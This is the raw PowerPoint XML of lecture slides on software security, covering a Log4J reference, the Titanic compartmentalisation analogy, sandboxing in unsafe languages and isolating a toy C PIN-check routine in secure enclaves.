              <a:t>US Cyber Safety Review Board wrote up good report on Log4J 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13E89-4019-F9D3-167B-1FB4EAEB12E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DF70789-C4F8-4BCF-B9A2-E0E34052E275}" type="slidenum">
              <a:rPr lang="en-US" altLang="nl-NL" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>59</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="nl-NL"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="A logo with a red circle and white text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CAD00B4C-67C0-7666-66A2-F620E5737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5" y="1691605"/>
            <a:ext cx="2568577" cy="10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EDDB0556-76E3-B71E-DCFA-6FE258B488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Titanic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A9260E-A088-D3E0-8F9C-EF25A2BE0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dirty="0"/>
              <a:t>Does this mean compartmentalising is a bad idea?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dirty="0"/>
              <a:t>No, but </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>the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>
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>attacker model </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>was </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>wrong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/>
              <a:t>Making vessel double-hulled would have been a better form of compartmentalising.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7172" name="Tijdelijke aanduiding voor dianummer 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{345A3A9B-E586-2745-F9F7-6EE7A0C8EF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D3CC80A4-4F3F-4FCF-B8C3-63502D96C1CD}" type="slidenum">
              <a:rPr lang="en-US" altLang="nl-NL" smtClean="0"/>
              <a:pPr/>
              <a:t>6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="nl-NL"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7173" name="Afbeelding 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A8EE12C-28CE-FAAE-A63B-3F1521B98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957263"/>
            <a:ext cx="50419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el 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FCB8E39A-D565-0FEE-4BB2-37EB77D05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Log4J attack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B48D8E-6A84-C4B2-C149-96589B1D2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sz="1764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1764" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Cas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1764" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> van </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1764" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Cooten</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1764" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, @</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1764" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>chvancooten</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1764" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, https://twitter.com/chvancooten/status/1469340927923826691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93188" name="Tijdelijke aanduiding voor dianummer 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62B015F0-4A09-2CC7-7F61-0E3FEE370F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541338"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 marL="817563" indent="-314325" defTabSz="541338"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 marL="1258888" indent="-250825" defTabSz="541338"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 marL="1763713" indent="-250825" defTabSz="541338"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 marL="2266950" indent="-250825" defTabSz="541338"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7241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31813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6385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40957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E43263B4-33DF-4CFA-9BD7-953625D303B5}" type="slidenum">
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1500" smtClean="0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60</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" altLang="nl-NL" sz="1500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="93189" name="Afbeelding 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A80C6110-6D77-BCAA-BFCB-24A3C3CC3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150938"/>
            <a:ext cx="351631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Afbeelding 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{354FDFCB-144A-4E78-F5EA-B974782BF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4878388"/>
            <a:ext cx="5283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Afbeelding 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{832D15B1-BCB3-CB3A-ABB0-7FE1F3291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398588"/>
            <a:ext cx="5113338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8663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4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD2259C2-302A-CF74-799A-6AC73F67DD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en-US"/>
              <a:t>3. Hardware-based sandboxing</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="nl-NL" altLang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US"/>
              <a:t>- also for unsafe languages</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="97283" name="Subtitle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6BADC75E-5640-6E3A-4F2C-4F055B02FD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DB1B5A34-4287-A9EA-2CA2-08AFC8D8A9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DF2B8A8-9DC6-426E-8599-32F54A65C33F}" type="slidenum">
              <a:rPr lang="en-US" altLang="nl-NL" smtClean="0"/>
              <a:pPr/>
              <a:t>61</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="nl-NL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F6F92EC8-6851-5D6D-CC08-933022999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Sandboxing in unsafe languages</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="en-US"/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836F6C62-7741-4789-A074-7DD0882B1D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>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Unsafe languages cannot provide sandboxing at language level	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An application written in an unsafe language could still </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>use OS sandboxing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>by splitting the code across different processes (as e.g. browsers use)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>An alternative approach:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>                                                                                   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>use sandboxing support provided by underlying hardware,               to impose memory access restrictions inside a process</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/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C88A954D-78BF-04DB-D097-0B58A27C5D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411CBA9-6B0A-4CA2-B57D-CFCDCBC4BFAD}" type="slidenum">
              <a:rPr lang="en-US" altLang="nl-NL" smtClean="0"/>
              <a:pPr/>
              <a:t>62</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{08A750DB-AC48-33A0-A4BD-DF548F08E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2400"/>
              <a:t>Example: security-sensitive code in large program </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="en-US" sz="2400"/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891E2C39-67FB-33F3-DC58-441FE1B118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F81F89AE-073D-45D0-96EF-0C562AFD81B7}" type="slidenum">
              <a:rPr lang="en-US" altLang="nl-NL" smtClean="0"/>
              <a:pPr/>
              <a:t>63</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="nl-NL"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="78853" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4CF6AED5-6554-5DAB-DCF0-0452235CA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4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6289675" y="989013"/>
            <a:ext cx="2681288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Box 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94525A72-C9F0-8F33-BF56-1DBC3591F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7032625"/>
            <a:ext cx="6500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altLang="en-US" sz="1400">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Example from [N. van Ginkel et al, Towards Safe Enclaves, HotSpot 2016]</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="en-US" sz="1400">
              <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79879" name="Freeform 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB617D0D-2773-FF53-E538-6E4381973E9F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="5835650" y="3886200"/>
            <a:ext cx="908050" cy="2555875"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 1 w 1776813"/>
              <a:gd name="T1" fmla="*/ 20410 h 2883877"/>
              <a:gd name="T2" fmla="*/ 1 w 1776813"/>
              <a:gd name="T3" fmla="*/ 8339 h 2883877"/>
              <a:gd name="T4" fmla="*/ 0 w 1776813"/>
              <a:gd name="T5" fmla="*/ 0 h 28838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6813" h="2883877">
                <a:moveTo>
                  <a:pt x="175846" y="2883877"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="990600" y="2271346"/>
                  <a:pt x="1805354" y="1658815"/>
                  <a:pt x="1776046" y="1178169"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1746738" y="697523"/>
                  <a:pt x="873369" y="348761"/>
                  <a:pt x="0" y="0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335" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8BA464F5-41A9-35B7-501B-762DB7D3E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4846638"/>
            <a:ext cx="29337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en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Bugs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US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en-US">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>or</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>malicious code </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" i="1">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>anywhere</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> in the  program could </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>access the</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>high-security data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="99336" name="Tekstvak 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A2B8B45-4DBF-0A44-ED5B-25F882E25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1385888"/>
            <a:ext cx="3130550" cy="31384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Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>static int </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>tries_left = 3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" b="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>;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 static int </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>PIN = 1234</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" b="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>;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 static int </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>secret = 666</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" b="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" altLang="en-US" b="1">
              <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
            </a:endParaRP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int get_secret (int pin_guess) {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  if (tries_left &gt; 0) {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   if ( PIN == pin_guess) {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     tries_left = 3; return secret; } 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   else {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     tries_left--; return 0 ;}  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} }</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="99337" name="Tekstvak 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6727EE7D-9EAE-EA0C-93B1-C6E28887A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5124450"/>
            <a:ext cx="1968500" cy="1477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Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t># include ″secret.h″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… // other modules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void main () {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…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}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="99338" name="Tekstvak 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A6BE7E4-52D2-87B2-6AD5-ED65F4EF3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1000125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Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>secret.c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="99339" name="Tekstvak 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3F6A172-5739-398E-50CD-2BD916C6C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4729163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Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>main.c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9C2EAABE-021C-905C-6F32-ED38A0A35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2400"/>
              <a:t>Isolating security-sensitive code with secure enclaves </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="100355" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A62E0467-8795-1EDD-2B30-79F0D29A0F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E892A2AA-D5B0-4820-942A-C1FF3A92031F}" type="slidenum">
              <a:rPr lang="en-US" altLang="nl-NL" smtClean="0"/>
              <a:pPr/>
              <a:t>64</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="nl-NL"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="100356" name="Tekstvak 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C353EC72-B69A-D78E-EA27-6BAE88FD2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1385888"/>
            <a:ext cx="3130550" cy="31384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Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>static int </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>tries_left = 3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" b="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>;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 static int </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>PIN = 1234</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" b="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>;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 static int </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>secret = 666</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" b="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" altLang="en-US" b="1">
              <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
            </a:endParaRP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int get_secret (int pin_guess) {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  if (tries_left &gt; 0) {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   if ( PIN == pin_guess) {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     tries_left = 3; return secret; } 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   else {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     tries_left--; return 0 ;}  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} }</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="100357" name="Tekstvak 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{565AC80C-3D95-7DEA-B315-52EAD1A17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5124450"/>
            <a:ext cx="1968500" cy="1477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Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t># include ″secret.h″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… // other modules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void main () {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…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}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="100358" name="Tekstvak 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{684E30D6-3907-A3B0-537C-7314674D9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1000125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Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>secret.c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="100359" name="Tekstvak 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03578533-B638-69E6-D9AE-1BC569E51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4729163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Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>main.c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="100360" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{67F8BB1F-7F20-12D0-D841-B0B75E5BC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7" t="3464" r="32661" b="5792"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5976938" y="1047750"/>
            <a:ext cx="23876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1" name="Right Brace 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F9433DD-4B5C-CE4C-B1B6-5377F08AAD7A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8258175" y="4140200"/>
            <a:ext cx="158750" cy="1368425"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 8341"/>
              <a:gd name="adj2" fmla="val 50000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0362" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{29F1DD08-42F5-2AA5-BB73-1952CCB5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925" y="4572000"/>
            <a:ext cx="115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en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Enclave</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" altLang="en-US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0363" name="Rechthoek 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F035BEDA-E718-AFB5-C731-3424D56A4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4972050"/>
            <a:ext cx="1922463" cy="536575"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0099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/>
              <a:t> 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95A56C1-848A-B087-97C7-5A38BC34E77F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6208713" y="4457700"/>
            <a:ext cx="1924050" cy="514350"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent6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dirty="0">
                <a:latin typeface="Comic Sans MS" pitchFamily="64" charset="0"/>
              </a:rPr>
              <a:t>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549E6516-39FA-F13F-9884-42983FE4E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4438650"/>
            <a:ext cx="4984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itle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1347F96C-A395-DACC-5F4E-14C15CB98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2400"/>
              <a:t>Isolating security-sensitive code with secure enclaves </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="en-US" sz="2400"/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C52D078F-55D8-3E13-CEA3-77F7D58D6F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F7AA6B5-EDA4-425A-9BDE-F4369EB3A6CF}" type="slidenum">
              <a:rPr lang="en-US" altLang="nl-NL" smtClean="0"/>
              <a:pPr/>
              <a:t>65</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="nl-NL"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="101381" name="Tekstvak 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{15D30FE7-40F8-933B-9C29-82ABD3B6B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1385888"/>
            <a:ext cx="3130550" cy="31384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Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>static int </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>tries_left = 3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" b="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>;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 static int </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
